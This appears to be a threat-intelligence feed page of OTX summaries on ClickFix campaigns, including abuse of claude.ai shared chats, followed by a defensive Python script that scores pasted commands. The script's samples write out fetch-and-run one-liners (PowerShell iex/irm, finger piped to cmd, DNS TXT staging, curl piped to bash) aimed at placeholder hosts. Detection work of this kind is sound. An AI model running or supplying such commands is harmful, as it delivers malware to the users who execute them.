Threats Tagged 'clickfix'
PHISH ALERT: From a Simple Phishing Email to a Full Attack Arsenal: The Evolution of "ClickFix"
A phishing campaign representing the evolution of "ClickFix" relies on social engineering and victim-assisted execution to bypass endpoint security. Attackers send emails with urgent OneDrive document lures carrying malicious ZIP attachments. LNK shortcuts inside the archives redirect victims to landing pages that silently inject PowerShell commands into the clipboard; victims are then talked into running those commands themselves via Win+R, bypassing traditional security filters that never see the command. The campaign stages payloads through DNS TXT records to avoid HTTP-based detection and includes multiple malicious components: obfuscated scripts, fake MSI installers masquerading as legitimate software, and spyware-laden ISO images for persistent access. The campaign marks a shift toward long-term post-compromise control of the environment.
Source: AlienVault OTX General | Published: 06/23/2026, 12:11:53 UTC | Added: 06/23/2026, 19:09:14 UTC
Okendo Reviews Supply Chain Attack
On May 14, 2026, a supply chain attack was discovered targeting the Okendo Reviews widget, a customer review platform used by over 18,000 brands. The threat actor injected malicious JavaScript code into the legitimate widget, which is deployed on high-traffic e-commerce pages including storefronts and product pages. The compromised JavaScript acted as a staged loader, using obfuscation, localStorage tracking, User-Agent filtering, and XOR-based decoding to conceal next-stage infrastructure. The attack employed ClickFix-style social engineering to deceive users into executing malicious commands, ultimately delivering remote access trojans such as NetSupport and Remcos, or information stealers such as StealC. Affected websites received hundreds of thousands to millions of monthly visitors, with nearly 15,000 blocks recorded in a single day.
Source: AlienVault OTX General | Published: 06/18/2026, 15:00:36 UTC | Added: 06/18/2026, 20:36:32 UTC

Threat Actors Abuse claude.ai Shared Chat for ClickFix Malvertising Campaign
Cybercriminals orchestrated a malvertising operation leveraging Google Ads to impersonate popular AI developer tools including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains. Over seven weeks spanning April to June 2026, attackers deployed 106 unique malicious hostnames across six distinct waves, initially hosting ClickFix social engineering pages on GitLab infrastructure before pivoting to abuse claude.ai's legitimate shared chat feature. The campaign targeted technically proficient users searching for AI development tools, tricking them into executing terminal commands that deployed the MacSync infostealer. This credential-harvesting malware collected browser data, SSH keys, and cryptocurrency wallets. The Asia-Pacific region sustained the heaviest impact with 67.2% of over 2,000 victims, particularly concentrated in Taiwan. Anthropic responded by banning the malicious accounts and implementing additional abuse mitigations.
Severity: Medium | Type: Malware
Source: AlienVault OTX General | Published: 06/18/2026, 10:09:50 UTC | Added: 06/18/2026, 20:20:24 UTC
May 2026 Infostealer Trend Report
This analysis covers infostealer distribution trends observed during May 2026, based on automated collection systems and diagnostic logs. Distribution occurred primarily through malware disguised as cracks and keygens for pirated software, as well as through email campaigns. ACRStealer, Remus, and LummaC2 were the most prevalent families, with payloads hosted on services including Mediafire and AWS S3 buckets. Microsoft was the most impersonated company, followed by Auslogics and NVIDIA. EXE files represented 78.9% of execution types, while DLL side-loading accounted for 21.1%. macOS environments saw ClickFix techniques and malicious Bash scripts, with 142 scripts and 12 C2 domains identified. Email campaigns distributed AgentTesla and DarkCloud. Remus showed significant growth, comprising 36% of distributions, while LummaC2 remained the most prevalent variant overall.
Source: AlienVault OTX General | Published: 06/18/2026, 14:53:53 UTC | Added: 06/18/2026, 20:20:24 UTC
ClickFix Campaign Generated Via AI Delivers SmartRAT
In March 2026, threat actors leveraged AI-powered website builders to create typosquatting domains impersonating a Brazilian bank. The campaign employed ClickFix techniques, presenting victims with fake CAPTCHA and BSOD screens to trick them into executing malicious PowerShell commands. This delivered SmartRAT, a PowerShell-based banking trojan with capabilities including encrypted C2 communications, remote control of screen, keyboard and mouse, credential theft through keylogging and banking overlays, and QR code interception for transaction fraud. The malware establishes persistence via scheduled tasks and Windows services, and targets Brazilian financial institutions, payment platforms, and cryptocurrency exchanges. The threat actors' C2 panel contained critical authentication flaws allowing client-side bypass, suggesting deployment without adequate security review.
Source: AlienVault OTX General | Published: 06/17/2026, 18:20:54 UTC | Added: 06/17/2026, 20:35:04 UTC

Potemkin Loader & RMMProject: The Anatomy of a ClickFix Attack
A ClickFix social engineering attack on an unmonitored endpoint led to a multi-stage intrusion affecting over 11 hosts. The infection chain began with a malicious HTA payload that silently installed an MSI package containing Potemkin, a custom loader with a deterministic DGA. Potemkin delivered RMMProject, a 4.4 MB Lua-scriptable RAT featuring browser credential theft with Chrome App-Bound Encryption bypass, hidden-desktop remote control, and 15 distinct task types. The attacker deployed EtherRAT, a Node.js backdoor resolving C2 addresses from the Ethereum blockchain, and established a Cloudflare tunnel for persistent access. Hands-on-keyboard activity included battling Windows Defender through AMSI patches, registry modifications, and service termination, followed by lateral movement via WMIExec and SMBExec to deploy malware across the network and reach the domain controller.
Source: AlienVault OTX General | Published: 06/16/2026, 14:27:51 UTC | Added: 06/16/2026, 17:30:50 UTC

SilabRAT, What's Your Power?
SilabRAT is an advanced Remote Access Trojan offered as Malware-as-a-Service on dark web forums since late 2025, developed by threat actor o1oo1 and sold for $5,000 monthly. This financially motivated tool focuses on credential theft and cryptocurrency operations, featuring Hidden Virtual Network Computing (HVNC) for invisible remote control, browser profile cloning to bypass session protections, and automated cryptocurrency wallet password cracking. The RAT bypasses Chrome App-Bound Encryption, performs session hijacking, and includes keylogging, clipboard monitoring, and remote desktop capabilities. Distributed through phishing and ClickFix campaigns with operator-hosted infrastructure, SilabRAT uses ChaCha20-Poly1305 encryption for command-and-control communications. The developer also offers AsmCrypt, a companion crypter service, creating a complete malware bundle from evasion to execution and remote control.
Source: AlienVault OTX General | Published: 06/10/2026, 11:58:30 UTC | Added: 06/10/2026, 13:50:24 UTC

From Fake Amazon Security Alert to HarborWatch Agent: ClickFix Delivery of a Custom Monitoring RAT
A phishing campaign exploits Amazon's brand reputation through spoofed security alerts to deliver HarborWatch Agent, a custom remote access trojan. The attack chain begins with emails impersonating Amazon security notifications about suspicious account activity, directing victims to lookalike domains. Users are presented with fake CAPTCHA verification pages that employ ClickFix social engineering techniques, instructing them to execute PowerShell commands on their own systems. The multi-stage infection downloads mysql.exe from compromised infrastructure, which communicates with a Chinese-language command and control panel branded Harbor Sentinel. The RAT collects extensive system information including OS details, architecture, CPU count, disk usage, memory status, and network configuration, exfiltrating data through API endpoints to the threat actor's monitoring infrastructure.
Source: AlienVault OTX General | Published: 06/09/2026, 15:50:23 UTC | Added: 06/10/2026, 10:56:14 UTC

Technical Analysis of MLTBackdoor
In May 2026, a new malware family named MLTBackdoor was identified, likely leveraged by ransomware-related threat actors to establish footholds for lateral movement. Delivered through multi-stage ClickFix infection chains targeting automotive-related web pages, this backdoor employs obfuscation techniques including Mixed Boolean-Arithmetic and Control Flow Flattening. MLTBackdoor features indirect system calls, API hashing, and extensive anti-analysis checks that detect debuggers and sandboxed environments. Its capabilities include filesystem operations and a Beacon Object File loader that dynamically expands functionality. The malware uses custom encrypted binary protocols over TLS with Elliptic-Curve Diffie-Hellman key exchange for command-and-control communications. Additionally, it implements a deterministic date-based Domain Generation Algorithm to maintain access when hardcoded C2 domains become unreachable, demonstrating resilience against takedown attempts.
Source: AlienVault OTX General | Published: 06/09/2026, 20:11:50 UTC | Added: 06/10/2026, 10:56:14 UTC

ClickFix Is Now Hiring: From Job Platform Impersonation to Python-Based RAT Delivery
A multi-stage phishing campaign emerged in early May 2026, impersonating LinkedIn and Indeed through typosquatted domains to deliver malicious payloads. The attack chain begins with fake CAPTCHA pages distributed via Google Ads, leveraging the legacy Finger protocol and native Windows utilities. Victims are tricked into executing commands that deploy portable Python runtimes (CPython or IronPython), which then execute in-memory shellcode. The campaign delivers CastleLoader, a Malware-as-a-Service framework using ChaCha20 and RC4 encryption for C2 communications, followed by a Python-based remote access trojan. The RAT provides interactive shell control, in-memory payload execution, and persistence mechanisms. The campaign represents an evolution of browser-based social engineering, combining Living-off-the-Land binaries with Python-based delivery to maintain a fileless footprint and evade detection through legitimate system utilities.
Source: AlienVault OTX General | Published: 06/04/2026, 22:52:19 UTC | Added: 06/05/2026, 06:18:37 UTC
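The common thread across the entries above is that the victim types or pastes the first-stage command themselves, so the most reliable artifact is the command string: Win+R commands are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, the same strings appear as process command lines in Sysmon Event ID 1 or EDR telemetry, and on macOS they land in shell history. The following is an added triage script, not code from the page, from AlienVault OTX, or from any of the reports summarised here. It scores such strings against the delivery primitives the entries describe (hidden-window PowerShell with a download cradle and in-memory execution, DNS TXT payload staging, finger.exe as a fetch primitive, LOLBin launchers, and curl-piped-to-shell on macOS). The rule weights, the verdict thresholds, and every sample command, hostname and address (example.invalid, 203.0.113.10) are this example's own assumptions.

```python
"""Triage of ClickFix-style "paste and run" commands.

Added example (not code from the page, AlienVault OTX, or any vendor). It scores
command strings recovered from RunMRU, process-creation telemetry, or shell
history against the first-stage techniques the reports above describe. Rule
weights, thresholds, and all sample commands/hosts are assumptions for the demo.
"""
import re
from dataclasses import dataclass, field

# (name, weight, pattern). Weights and thresholds are this example's own choice.
RULES = [
    ("hidden_window", 2, re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I)),
    ("bypass_policy", 1, re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+bypass", re.I)),
    ("encoded_command", 2, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # Download cradles on Windows and macOS.
    ("download_cradle", 3, re.compile(
        r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
        r"curl|wget|bitsadmin|certutil)\b", re.I)),
    # Fetched content executed without touching disk: iex, `| bash`, bash -c "$(...)".
    ("in_memory_exec", 3, re.compile(
        r"\b(?:iex|invoke-expression)\b|\|\s*(?:ba|z)?sh\b|(?:ba|z)?sh\s+-c\s+[\"']?\$\(", re.I)),
    # Payload staging over DNS TXT records instead of HTTP.
    ("dns_txt_staging", 3, re.compile(
        r"resolve-dnsname[^|;]*-type\s+txt|nslookup\s+-(?:q|type|querytype)=txt", re.I)),
    # Legacy finger.exe used to pull the next stage.
    ("finger_protocol", 3, re.compile(r"\bfinger(?:\.exe)?\s+\S+@\S+", re.I)),
    ("lolbin_launcher", 2, re.compile(r"\b(?:mshta|rundll32|regsvr32)\b|\bcmd(?:\.exe)?\s+/c\b", re.I)),
    # Trailing comment that mimics a CAPTCHA/verification string so the pasted
    # line looks harmless in the Run box.
    ("captcha_lure_comment", 2, re.compile(r"#.*(?:not a robot|captcha|verification id|ray id)", re.I)),
]
SUSPICIOUS_AT, LIKELY_AT = 3, 5
URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)


@dataclass
class Triage:
    command: str
    hits: list = field(default_factory=list)
    score: int = 0
    urls: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        if self.score >= LIKELY_AT:
            return "likely_clickfix"
        if self.score >= SUSPICIOUS_AT:
            return "suspicious"
        return "benign"


def triage(command: str) -> Triage:
    """Score one command string and extract URLs for blocking or pivoting."""
    t = Triage(command=command)
    for name, weight, rx in RULES:
        if rx.search(command):
            t.hits.append(name)
            t.score += weight
    t.urls = URL_RE.findall(command)
    return t


def parse_runmru(values: dict) -> list:
    """Return RunMRU commands most-recent-first.

    `values` mirrors the registry key: one-letter slots holding each command
    with Explorer's trailing "\\1" marker, plus "MRUList" giving the order.
    """
    cmds = []
    for slot in values.get("MRUList", ""):
        raw = values.get(slot)
        if raw is not None:
            cmds.append(raw[:-2] if raw.endswith("\\1") else raw)
    return cmds


# Constructed sample RunMRU contents (not taken from any real host).
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad C:\\Users\\alice\\notes.txt\\1",
    "b": "cmd /c \"finger user@203.0.113.10 | cmd\"\\1",
    "c": "powershell -w hidden -c \"iex (irm https://example.invalid/verify)\""
         " # \u2705 I am not a robot - reCAPTCHA Verification ID: 7391\\1",
}
# Constructed non-RunMRU samples: DNS TXT staging, and a macOS terminal lure.
SAMPLE_DNS_TXT = ("powershell -ep bypass -c \"iex ((Resolve-DnsName -Type TXT "
                  "stage.example.invalid).Strings -join '')\"")
SAMPLE_MACOS = "/bin/bash -c \"$(curl -fsSL https://example.invalid/setup.sh)\""


if __name__ == "__main__":
    for cmd in parse_runmru(SAMPLE_RUNMRU) + [SAMPLE_DNS_TXT, SAMPLE_MACOS]:
        t = triage(cmd)
        print(f"{t.verdict:16} score={t.score:<2} hits={','.join(t.hits) or '-'} urls={t.urls}")
        print(f"    {cmd}")
```

The scoring is deliberately additive rather than a single regex, because a lure that uses only one primitive (a bare certutil fetch, for instance) should surface as suspicious for review while the stacked hidden-window, cradle, in-memory and fake-CAPTCHA pattern goes straight to "likely". Feed it the RunMRU values exported from a host, or the CommandLine field of process-creation events, and treat the extracted URLs as pivots into web-proxy and DNS logs rather than as verdicts in themselves.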